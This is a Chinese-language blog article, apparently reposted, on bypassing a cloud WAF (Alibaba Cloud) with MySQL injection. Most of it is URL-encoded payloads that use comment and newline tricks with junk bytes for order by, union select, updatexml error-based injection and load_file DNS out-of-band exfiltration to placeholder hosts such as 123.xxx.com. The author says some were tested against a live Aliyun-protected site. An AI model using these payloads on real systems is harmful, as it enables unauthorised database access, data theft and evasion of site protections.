其他
MySQL注入-Bypass
The following article is from XG小刚 Author XG小刚
mysql的一些小技巧
WHERE id= '2.0abc' 转为数字时变成2http://127.0.0.1/sql/Less-38/index.php?id=%80%81%82函数与括号之间可添加空格、换行、注释
select user (),database/**/(),version#123() from users;SELECT * FROMusers WHERE id= '3.0abc'-1/**/union/**/select'3.0abc',2,3fromusers;注释符:--,#,/**/#单行注释后面所有内容,换行后注释失效--和#号一样,但是后边必须有个空格,没空格则视为两个减号/*aaa*/可用多行注释注释内容在sql语句中解析为空格SELECT * FROM (users) WHERE (id='3.0abc') union (select '3.0abc',2,user() from (users));SELECT*FROM(users)WHERE(id='3.0abc')union(select'3.0abc',2,user()from`users`);就列举几个啊,其他什么内联注释什么的基本不能用了。
构造绕过语句
绕waf无非就是构造语句,突破防sql的正则表达式
根据上面规则可以构造一些垃圾字符,插入语句中并能正常运行。
常用就是注释配合换行符,然后在注释部分插入不可解析的ascii码
--%20/*%99%0a--%20%0d%0a%23/*%99%0a%23/*%99%0a找个阿里云的站,有没有注入点无所谓,只要阿里云没拦截,本地用mysql执行一下看看成功运行即可。
?id=1%27%20or%20%271看上面逻辑判断直接拦截啊,删除or前后空格
?id=1%27or%271 #字符型注入?id=1%20or%201 #数字型注入沒拦截,看看本地能运行不
这里我本地搭建的sqli环境
成功运行啊,后面简单说说其他常规语句的绕过
order by 1
order by常用于判断列表数
?id=1%27order%20by%20id%23?id=1%27order%23/*%99%0aby%23/*%99%0a4%23?id=1%20order%23/*%99%0aby%23/*%99%0aid%23?id=1%20order%23/*%99%0aby%23/*%99%0a4%23union select x from x
联合注入
?id=union%23/*%99%0aselect?id=union--%20%0d%0a%23/*%99%0aselect?id=union--%20%0d%0a%23/*%99%0aselect--%20%0d%0a%23/*%99%0aa,2,asd?id=union--%20%0d%0a%23/*%99%0aselect--%20%0d%0a%23/*%99%0a1,id,3%20from%20users?id=1%27union--%20%0d%0a%23/*%99%0aselect--%20%0d%0a%23/*%99%0a1,id,3%20from%20users%23%27?id=1%20union--%20%0d%0a%23/*%99%0aselect--%20%0d%0a%23/*%99%0a1,id,3%20from%20users%23?id=1%27union--%20%0d%0a%23/*%99%0aselect--%20%0d%0a%23/*%99%0a1,%23/*%99%0auser(),3%20from%20users%23load_file()
dns外带查询,阿里云拦截率dnslog,所以使用别的网站
?id=1%27union--%20%0d%0a%23/*%99%0aselect--%20%0d%0a%23/*%99%0aload_file(%22//123.xxx.com/abc%22)%23?id=1%27%26%26(--%20%0d%0a%23/*%99%0aselect--%20%0d%0a%23/*%99%0aload_file(%22//123.xxx.cn/abc%22))%23?id=1%27%26%26(--%20%0d%0a%23/*%99%0aselect--%20%0d%0a%23/*%99%0aload_file(%23/./%23/*%99%0a))%23?id=concat(%27//%27,(select%23/*%99%0a123),%22.123.test.com/abc%22)?id=1%27%26%26(--%20%0d%0a%23/*%99%0aselect--%20%0d%0a%23/*%99%0aload_file(%23/./%23/*%99%0d%0aconcat(%27//%27,(%23%0aselect%23/*%99%0a111),%27.123.text.com/abc%27)))%23?id=1%20%26%26(--%20%0d%0a%23/*%99%0aselect--%20%0d%0a%23/*%99%0aload_file(%23/./%23/*%99%0d%0aconcat(%27//%27,(%23%0aselect%23/*%99%0a111),%27.123.text.com/abc%27)))%23updatexml()
报错注入,其他报错函数绕过方式应该差不多
?id=updatexml%23/*%99%0a(1,1,1)?id=1%27and%20updatexml%23/*%99%0a(1,1,1)%23%27?id=1%20and%20updatexml%23/*%99%0a(1,1,1)?id=updatexml%23/*%99%0d%0a(0,(%23/*%99%0d%0aselect%0aa),%27a)%27)?id=1%27%26%26updatexml%23/*%99%0d%0a(0,(%23%0aselect%23/*%99%0a111),%27a)%27)%23?id=1%20and%20updatexml%23/*%99%0d%0a(0,(%23%0aselect%23/*%99%0a111),%27a)%27)%23concat%0a%23concat)%0d%0a(%27//~%27,(select%23/*%99%0a123),0x7e)?id=1%27%26%26updatexml%23/*%99%0d%0a(0,concat%0a%23concat)%0d%0a(%27//~%27,(select%23/*%99%0a123),0x7e),%27a)%27)%23?id=1%20and%20updatexml%23/*%99%0d%0a(0,concat%0a%23concat)%0d%0a(%27//~%27,(select%23/*%99%0a123),0x7e),%27a)%27)%23其他
上面语句有的部分能过阿里云,但是一改参数名,就不行了
比如参数id可以过
?id=1%20and%20updatexml%23/*%99%0d%0a(0,concat%0a%23concat)%0d%0a(%27//~%27,(select%23/*%99%0a123),0x7e),%27a)%27)%23参数改为title等其他的就不行了
在已经构造好上面语句的基础上
这里只要改改and或者or为&&(%26%26)和||()的url编码,删除或添加空格%20有可能绕过
上面语句and改为&&,删除前后空格即可绕过
?title=1%26%26updatexml%23/*%99%0d%0a(0,concat%0a%23concat)%0d%0a(%27//~%27,(select%23/*%99%0a123),0x7e),%27a)%27)%23再举个例子,参数改为title被拦截了
?title=1%27%26%26(--%20%0d%0a%23/*%99%0aselect--%20%0d%0a%23/*%99%0aload_file(%23/./%23/*%99%0d%0aconcat(%27//%27,(%23%0aselect%23/*%99%0a111),%27.123.text.com/abc%27)))%23在数字1前面添加个空格%20就绕过了
?title=%201%27%26%26(--%20%0d%0a%23/*%99%0aselect--%20%0d%0a%23/*%99%0aload_file(%23/./%23/*%99%0d%0aconcat(%27//%27,(%23%0aselect%23/*%99%0a111),%27.123.text.com/abc%27)))%23很离谱,很玄学。